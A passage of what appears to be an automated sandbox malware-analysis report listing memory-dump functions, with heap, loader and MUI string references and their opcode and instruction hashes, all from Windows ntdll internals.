                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                              • API String ID: 0-1356375266
                                                              • Opcode ID: e0775375f7fd34a4fc168f3257e71d78a6bb60db3ae4b24e23ddfcae14bfdbd2
                                                              • Instruction ID: 0c8177d3c2d05802c2aa677ab035baf70dc1eb363782530163afa14336c210fa
                                                              • Opcode Fuzzy Hash: e0775375f7fd34a4fc168f3257e71d78a6bb60db3ae4b24e23ddfcae14bfdbd2
                                                              • Instruction Fuzzy Hash: C9A169B1909305DFE321CF61C591B9BB7F8FB88795F41492EE98896240E774E908CF92
                                                              Function 3593F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-523794902
                                                              • Opcode ID: 5def14602a72e01382af6e90cd890584cad0f6a692fdef6f34131e21a1ba9ec1
                                                              • Instruction ID: 383eeb29e01e4b8278425f6e9d2a8986c9a3fcc232922e7ff9cc88e5b7636a28
                                                              • Opcode Fuzzy Hash: 5def14602a72e01382af6e90cd890584cad0f6a692fdef6f34131e21a1ba9ec1
                                                              • Instruction Fuzzy Hash: C142F075209381DFD715CF28C885B6ABBE9FF88344F04496DE8868B352DB38E845CB52
                                                              Function 3595B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                              • API String ID: 0-122214566
                                                              • Opcode ID: dc9ac91d8bb9af592118fadc5d41bd42b2d1281b98c24a5d0d9c459f4aaf71fd
                                                              • Instruction ID: 448dd10b60f83e600cd454c399455dbee04cf21da40ab50bca0b885da562c636
                                                              • Opcode Fuzzy Hash: dc9ac91d8bb9af592118fadc5d41bd42b2d1281b98c24a5d0d9c459f4aaf71fd
                                                              • Instruction Fuzzy Hash: D2C13871A04315ABEB25CF64C880B7E77BAFF45324F5448A9E903AB281DFB49954C3A1
                                                              Function 35950770 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: e1963a08290d9a0446c840b184093ca845a7a662cef61aac84429f815344af58
                                                              • Instruction ID: bf7efffdbebc0a2f0114f7eab5ccc0e38e53b4483a3eed23aa1e0106d6509fd8
                                                              • Opcode Fuzzy Hash: e1963a08290d9a0446c840b184093ca845a7a662cef61aac84429f815344af58
                                                              • Instruction Fuzzy Hash: 19F1BB75B00605DFEB15CF68C994F6AB7BAFF44314F1185A8E8069B381DB34E991CBA0
                                                              Function 3596F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 359B02E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 359B02BD
                                                              • RTL: Re-Waiting, xrefs: 359B031E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: 464de6d8ad16c178b21f4fc1477a6caa8563c648340afa1892923def763ab5ae
                                                              • Instruction ID: fe2ebd4a1f3cb42f0e8472fcd3376783b0ad36f91dc798308e6f93d0e58227b6
                                                              • Opcode Fuzzy Hash: 464de6d8ad16c178b21f4fc1477a6caa8563c648340afa1892923def763ab5ae
                                                              • Instruction Fuzzy Hash: D9E1D1746087419FEB21CF28C884B0AB7E5FF84368F140A5DF4A58B2D1DBB4E949CB42
                                                              Function 359651EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 3596522A
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 35965352
                                                              • Kernel-MUI-Language-Allowed, xrefs: 3596527B
                                                              • Kernel-MUI-Language-SKU, xrefs: 3596542B
                                                              • Kernel-MUI-Number-Allowed, xrefs: 35965247
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-258546922
                                                              • Opcode ID: 8caf79284deaa322c88f8e04cad7d5dbda99bf1dc20f9683bbe83cd013a763d4
                                                              • Instruction ID: f395216017e39cafeec920f2f742161e0409ef0a653c7acb9d8472e0d2ea0277
                                                              • Opcode Fuzzy Hash: 8caf79284deaa322c88f8e04cad7d5dbda99bf1dc20f9683bbe83cd013a763d4
                                                              • Instruction Fuzzy Hash: DEF14C76D14219EFDB11CF98C980DDEBBBDFF48664F51406AE801A7211EB74AE05CBA0
                                                              Function 35A1B16B Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: a33fe3a0ec130e0c1100942b00845d13e33098847c89de66eae895f1ea9a342e
                                                              • Instruction ID: e59c29b21bbcb083ccb7e22596ba1154afc081b66fb005f4f686f50b8cf83334
                                                              • Opcode Fuzzy Hash: a33fe3a0ec130e0c1100942b00845d13e33098847c89de66eae895f1ea9a342e
                                                              • Instruction Fuzzy Hash: 69F10776F042198FDB08CF69C990A7DBBF6BF98210B59416DDC66EB380D634EA01DB50
                                                              Function 359CFD2A Relevance: 6.4, Strings: 5, Instructions: 115COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Item:$ Language:$ Name:$SR - $Type:
                                                              • API String ID: 0-3082644519
                                                              • Opcode ID: 589019ecb74df9b53e079787639f9ffc7e1e5c2c1a9a30834cf9b0d20d6e80e5
                                                              • Instruction ID: 22fb2c2b3e1a949c89819a97a9983c2b3f305306c43b36ed018e7bba962d7d4c
                                                              • Opcode Fuzzy Hash: 589019ecb74df9b53e079787639f9ffc7e1e5c2c1a9a30834cf9b0d20d6e80e5
                                                              • Instruction Fuzzy Hash: CA417F72A0126CAFDB21CB65CC48BDAB7BCEF46314F4141D5A849A7246DE34AE84CF52
                                                              Function 359376B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                              • API String ID: 0-3061284088
                                                              • Opcode ID: a4acf7871a690cc0a5d502093337d9a09ae29671604c7bb414379af4c15e30b3
                                                              • Instruction ID: 47080c76545e71c3d613c99dc326ca6de312da60c8f059e06209ecf940dfe1da
                                                              • Opcode Fuzzy Hash: a4acf7871a690cc0a5d502093337d9a09ae29671604c7bb414379af4c15e30b3
                                                              • Instruction Fuzzy Hash: BA01703711E254DEE3198318DC0BF9677E9EB82734F174059E4004B651DFA8EC80C920
                                                              Function 359570C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: c29b8da5c64d4653f465e89b5679a2b4288bf1e2cc7714f4f48060914bca54d7
                                                              • Instruction ID: 72ff6f9ef6398120f117969d2974ab984cd7308e52b9340a41cd373a3e03be28
                                                              • Opcode Fuzzy Hash: c29b8da5c64d4653f465e89b5679a2b4288bf1e2cc7714f4f48060914bca54d7
                                                              • Instruction Fuzzy Hash: 0A130374A04319CFEB14CF68C880BA9BBF5FF48354F2489A9D845AB381D774A956CF90
                                                              Function 35953D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 472aeea846011f4821b984ca5689cb70f4c672450296ac41f073acb6b5a3857d
                                                              • Instruction ID: a3d3f61603c8f11b543225946bdd6642318caa2bd13f281a2292ebf9f5c5e12f
                                                              • Opcode Fuzzy Hash: 472aeea846011f4821b984ca5689cb70f4c672450296ac41f073acb6b5a3857d
                                                              • Instruction Fuzzy Hash: 28E2DD74A04315CFEB54CF69C880BA9BBF5FF48314F1485A9E849AB382D774A856CF90
                                                              Function 3593F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                              • API String ID: 0-2586055223
                                                              • Opcode ID: 71decd639c35ecf6e95d547b473af9701d37ee5c405674c5ec326ea2fa01ba69
                                                              • Instruction ID: 2d912f5eee3b675cf5aa805678f7016b07974ee6466968f3bdec49f88df184a1
                                                              • Opcode Fuzzy Hash: 71decd639c35ecf6e95d547b473af9701d37ee5c405674c5ec326ea2fa01ba69
                                                              • Instruction Fuzzy Hash: C5610FB6205784EFE712CB24C946FA677F9FF84754F040868F9558B292DB78E840CB62
                                                              Function 359F11A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                              • API String ID: 0-336120773
                                                              • Opcode ID: c3aa83fd4b2b6d9e9a2404b11992e781777ec1e32525b17ea40432bb4734a262
                                                              • Instruction ID: 9a5a3c4537f68f023642e14e22ac5177f826d2c9d885dd892a42f874c5fb40e0
                                                              • Opcode Fuzzy Hash: c3aa83fd4b2b6d9e9a2404b11992e781777ec1e32525b17ea40432bb4734a262
                                                              • Instruction Fuzzy Hash: E9310F36205294EFE711CBD8C882F9A73E9FF08765F120095E411DB291EB32ED40EBA4
                                                              Function 35939148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                              • API String ID: 0-1391187441
                                                              • Opcode ID: ad6d83addc84c0802061a4d36bf2c38fa91685fe4f0220a51a7cf442b422d697
                                                              • Instruction ID: 433cee2553f6e0205f413ce48fe4d73a3c611120612fcff3b141964637b602d2
                                                              • Opcode Fuzzy Hash: ad6d83addc84c0802061a4d36bf2c38fa91685fe4f0220a51a7cf442b422d697
                                                              • Instruction Fuzzy Hash: CF31CF36606218EFDB01CB85C886F9AB7FEEF44760F124095E914AB291EB74ED40CE61
                                                              Function 35947152 Relevance: 4.7, APIs: 3, Instructions: 158timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: f53c8db07570b596545203dfd9d6c2b111e5b1a32a98b222279940dea27c7af1
                                                              • Instruction ID: 128940e5fb1f02af10890b1ed767e99a4938f128aba22f2a79386d143f1ab12f
                                                              • Opcode Fuzzy Hash: f53c8db07570b596545203dfd9d6c2b111e5b1a32a98b222279940dea27c7af1
                                                              • Instruction Fuzzy Hash: 145104B5A04709EFEB06CF64CE44BADB7B9FF08355F144169E412A3290DBB4AD02DB90
                                                              Function 35941460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP[%wZ]: , xrefs: 35941712
                                                              • HEAP: , xrefs: 35941596
                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 35941728
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                              • API String ID: 0-3178619729
                                                              • Opcode ID: 2bb8c221fd774ea016060f0ed7edc9530de9b3a433ab30dc1a23748f07a26fa0
                                                              • Instruction ID: 7d881291ef128e1511407559f7f9b6786261cc1f0473ce6f8e272ec889040e06
                                                              • Opcode Fuzzy Hash: 2bb8c221fd774ea016060f0ed7edc9530de9b3a433ab30dc1a23748f07a26fa0
                                                              • Instruction Fuzzy Hash: EEE101B4A043859FE719CF29C451BBABBF6BF48304F18885DE496CB246EB34E940DB50
                                                              Function 3594B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                              • API String ID: 0-1145731471
                                                              • Opcode ID: 184d6ee2ce18dc2d774e1082c736d7007fac126db17504397730c45727d068f8
                                                              • Instruction ID: ea78933909392b065494ebe7ab74f57a108335207a781c5c7c3ad7d945588cbf
                                                              • Opcode Fuzzy Hash: 184d6ee2ce18dc2d774e1082c736d7007fac126db17504397730c45727d068f8
                                                              • Instruction Fuzzy Hash: 36B1BDB6E187058FEB25CF69C980B9EB7B6BF48354F154529E811EB780D734E840CB20
                                                              Function 359C368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                              • API String ID: 0-2391371766
                                                              • Opcode ID: 0047169020f3b3aa3751d139037be014edaa3677279d109263e3623d332915f5
                                                              • Instruction ID: 9a2361a03ebc8ed29fd4e2bf7e751c9df1b5fc1a1ac1ac62d3c4f17eff5e184a
                                                              • Opcode Fuzzy Hash: 0047169020f3b3aa3751d139037be014edaa3677279d109263e3623d332915f5
                                                              • Instruction Fuzzy Hash: 19B198B2608345AFE711CE54D8C0F5BB7F8BB48754F41086AFA41AB280DB75E815CB92
                                                              Function 359D36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                              • API String ID: 0-318774311
                                                              • Opcode ID: 403d5119168f3e243ed7bc5ff0bac7db94cb23f4d25df2207f852ff93d475b22
                                                              • Instruction ID: 85c42008438e8812a0000b196c89c880108255ec941b18b9ef7fa38036bf68b5
                                                              • Opcode Fuzzy Hash: 403d5119168f3e243ed7bc5ff0bac7db94cb23f4d25df2207f852ff93d475b22
                                                              • Instruction Fuzzy Hash: 07818BB5608740AFE711CF25C840B6AB7E8FF89791F44892DF9819B391DB74E904CB62
                                                              Function 359C7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                              • API String ID: 0-3870751728
                                                              • Opcode ID: 5927a2a1da4e91c8788e597f30b0325c189d5af81e267144b27689356137d6ea
                                                              • Instruction ID: 63e1abc90892d9e249b8c375217a746c884b831e23b01a7e2b7bab126ad91cc8
                                                              • Opcode Fuzzy Hash: 5927a2a1da4e91c8788e597f30b0325c189d5af81e267144b27689356137d6ea
                                                              • Instruction Fuzzy Hash: 47913BB4E002099FEB14CF69C980BADBBF1BF48354F1481AED905AB291E7759842CF95
                                                              Function 3594B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035A3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000004.00000002.3610107598.0000000035AAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_35910000_450707124374000811.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                              • API String ID: 0-373624363
                                                              • Opcode ID: 9936a4f52cd9b46abd7e9dd040145c1898c9663a34af3652ee51a567b7aa4351
                                                              • Instruction ID: 376e75c827de8e4e56db3b09a428cdb7bf0736f5836c0a659feb865ebbcd65c0
                                                              • Opcode Fuzzy Hash: 9936a4f52cd9b46abd7e9dd040145c1898c9663a34af3652ee51a567b7aa4351
                                                              • Instruction Fuzzy Hash: 0391AEB6A08359CBEF21CF58C540BAEB7B6FF05364F144195EC51AB290D7B89E40CBA0
                                                              Function 3597909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3610107598.0000000035910000.00000040.00001000.00020000.00000000.sdmp, Offset: 35910000, based on PE: true
                                                              • Associated: 00000004.00000002.3610107598.0000000035A39000.00000040.00001000.00020000.00000000.sdmpDownload File
